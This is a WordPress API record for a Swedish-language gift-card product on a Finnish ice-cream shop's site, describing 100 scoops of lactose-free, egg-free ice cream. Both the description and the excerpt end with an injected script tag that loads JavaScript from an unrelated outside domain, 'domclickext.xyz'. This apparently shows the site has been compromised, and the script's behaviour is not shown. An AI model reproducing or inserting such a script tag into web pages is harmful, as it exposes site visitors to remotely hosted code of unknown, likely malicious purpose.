{"id":889,"date":"2025-05-13T10:47:01","date_gmt":"2025-05-13T10:47:01","guid":{"rendered":"https:\/\/zum.fi\/tuote\/glassvaluta-100-glasskulor\/"},"modified":"2025-05-13T11:45:33","modified_gmt":"2025-05-13T11:45:33","slug":"glassvaluta-100-kulor","status":"publish","type":"product","link":"https:\/\/zum.fi\/sv\/tuote\/glassvaluta-100-kulor\/","title":{"rendered":"Glassvaluta &#8211; 100 Glasskulor"},"content":{"rendered":"<p>Zum-glass f\u00f6ddes ur k\u00e4rleken till perfekt glass. Vi reste till glassens hemland Italien och tog med oss all kunskap om glassframst\u00e4llning till Zum&#8217;s k\u00f6k. I v\u00e5r glass finns inget on\u00f6digt. Vi anv\u00e4nder inte f\u00e4rdiga blandningar eller emulgeringsmedel, och vi kompromissar inte med smaken genom \u00f6verdriven anv\u00e4ndning av socker Vi anv\u00e4nder \u00e4kta och de b\u00e4sta m\u00f6jliga ingredienserna.<\/p>\n<p>F\u00f6r att s\u00e5 m\u00e5nga som m\u00f6jligt ska kunna njuta av Zum-glass g\u00f6r vi den p\u00e5 laktosfri mj\u00f6lk och utan \u00e4gg. V\u00e5ra glassar \u00e4r glutenfria. Vi tillverkar ocks\u00e5 l\u00e4ckra veganska glassar och sorbeter. F\u00f6r en vuxen smak har vi \u00e4ven alkoholhaltiga glassar. Sortimentet varierar beroende p\u00e5 s\u00e4songen.<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Med valutan kan du l\u00f6sa in 100 bollar av Zum Beispiel-restaurangens hemgjorda Zum-glass. Presentkortet kan du best\u00e4lla till mottagarens (eller din egen) e-post. Du kan antingen skriva ut presentkortet p\u00e5 papper eller visa det p\u00e5 telefonens sk\u00e4rm p\u00e5 restaurangen. P\u00e5 restaurangen \u00f6verl\u00e4mnas ett glasspass mot presentkortet, d\u00e4r du f\u00e5r en st\u00e4mpel varje g\u00e5ng du l\u00f6ser in en glasskula. Passet \u00e4r giltigt i 12 m\u00e5nader fr\u00e5n presentkortets ink\u00f6psdatum.<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":670,"template":"","meta":{"_kad_blocks_custom_css":"","_kad_blocks_head_custom_js":"","_kad_blocks_body_custom_js":"","_kad_blocks_footer_custom_js":"","_kad_post_transparent":"default","_kad_post_title":"","_kad_post_layout":"default","_kad_post_sidebar_id":"","_kad_post_content_style":"default","_kad_post_vertical_padding":"default","_kad_post_feature":"","_kad_post_feature_position":"","_kad_post_header":false,"_kad_post_footer":false,"_kad_post_classname":""},"product_brand":[],"product_cat":[58],"product_tag":[],"giftcard-category":[],"class_list":{"0":"post-889","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-glassvaluta","8":"first","9":"instock","10":"virtual","11":"taxable","12":"purchasable","13":"product-type-gift-card","14":"entry","15":"content-bg","16":"loop-entry"},"taxonomy_info":{"product_cat":[{"value":58,"label":"Glassvaluta"}]},"featured_image_src_large":["https:\/\/zum.fi\/wp-content\/uploads\/2023\/09\/zum-jaatelo-100.jpg",783,701,false],"author_info":[],"comment_info":"","_links":{"self":[{"href":"https:\/\/zum.fi\/sv\/wp-json\/wp\/v2\/product\/889","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zum.fi\/sv\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/zum.fi\/sv\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/zum.fi\/sv\/wp-json\/wp\/v2\/media\/670"}],"wp:attachment":[{"href":"https:\/\/zum.fi\/sv\/wp-json\/wp\/v2\/media?parent=889"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/zum.fi\/sv\/wp-json\/wp\/v2\/product_brand?post=889"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/zum.fi\/sv\/wp-json\/wp\/v2\/product_cat?post=889"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/zum.fi\/sv\/wp-json\/wp\/v2\/product_tag?post=889"},{"taxonomy":"giftcard-category","embeddable":true,"href":"https:\/\/zum.fi\/sv\/wp-json\/wp\/v2\/giftcard-category?post=889"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}